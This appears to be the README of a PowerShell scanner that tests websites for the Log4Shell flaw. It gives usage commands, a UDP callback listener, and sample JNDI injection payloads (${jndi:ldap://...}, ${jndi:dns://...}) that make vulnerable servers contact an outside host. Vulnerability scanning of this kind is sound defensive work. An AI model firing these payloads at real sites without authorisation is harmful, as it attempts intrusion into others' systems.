Powershell module for Log4Shell
PS>. .Invoke-Log4ShellScanner.ps1
PS>Invoke-Log4ShellScanner -Uri [sites file] -CanaryTokenDNS [canary token/ custom IP/DNS] -Headers [headers file] -Forms -Quick
PS>Invoke-Log4ShellFastScan -Uri [sites_file] -CanaryTokenDNS [canary token/ custom IP/DNS]
PS>Invoke-Log4ShellCheckForms -Uri [url_address] -Payload
_PS>Invoke-VitnessLogger -Port 53
- -Uri - file that contains URLs to scan (https://example.com example in example-sites.txt)
- -CanaryTokenDNS - IP address or domain name of OOB service which provide us the logs
- -Headers - file that contains headers to test (all-headers.txt)
- -Forms - switch to enable forms checking [OPTIONAL]
- -Quick - switch to provide fast scan (only 2 payloads are being tested) [OPTIONAL]
- -Payload - payload parameter (eg ${jndi:ldap://mysite.com/a})
- -Port - port on which the Vitness will be bound and listening
The Invoke-Log4ShellScanner is a powershell script that provides 3 functions:
- Invoke-Log4ShellScanner
The most advanced scan can test provided site pool for obfuscated payloads by sending GET,POST and optionally forms. The payload is placed inside the URI, choosen Headers and arguments of POST method and GET URI. - Invoke-Log4ShellFastScan
The simplest scan that uses basic payload and one obfuscated. Payload is placed inside the URI, parameter for GET method and "User-Agent" header. - Invoke-Log4ShellCheckForms
The function which perform checking the site (one URL) for forms and then placing the payload into the forms and send POST. - Invoke-VitnessLogger
Simple UDP listener on provided PORT - by default it just log the Name from the DNS query - ${jndi:dns://hostIP:53/Query}
The example files: all-headers.txt, example-sites.txt
[ ] The scanner cant crawl or spidering the site
[ ] There are issues with some forms
[ ] Port Scannner and possibilities to scan FTP/SQL and other potential services will be good.